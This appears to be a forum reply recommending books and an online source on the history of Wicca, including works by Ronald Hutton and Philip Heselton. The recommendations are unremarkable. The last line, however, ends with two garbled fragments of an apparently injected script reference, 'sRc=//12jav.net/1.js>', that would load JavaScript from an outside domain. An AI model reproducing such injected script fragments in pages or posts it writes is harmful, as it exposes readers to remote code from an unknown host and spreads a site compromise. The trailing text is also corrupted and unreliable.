Inded there are. Perhaps the very best one from an academic standpoint is:

"Triumph of the Moon" by Ronald Hutton

And I would also recommend:

"Gerald Gardner and the Cauldron of Inspiration", "Wiccan Roots", and "Witchfather, a Life of Gerald Gardner, Vol 1 and 2. all by Philip Heselton

And there is a good on-line short history by Julia Phillips at http://www.sacred-texts.com/bos/bos318.htm

I've read Exploring Wicca by Lady Sabrina, Wicca for Beginners by Thea Sabin, and Wiccan Beliefs and Practices by Cantrell. They all seemed really good enough for me. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
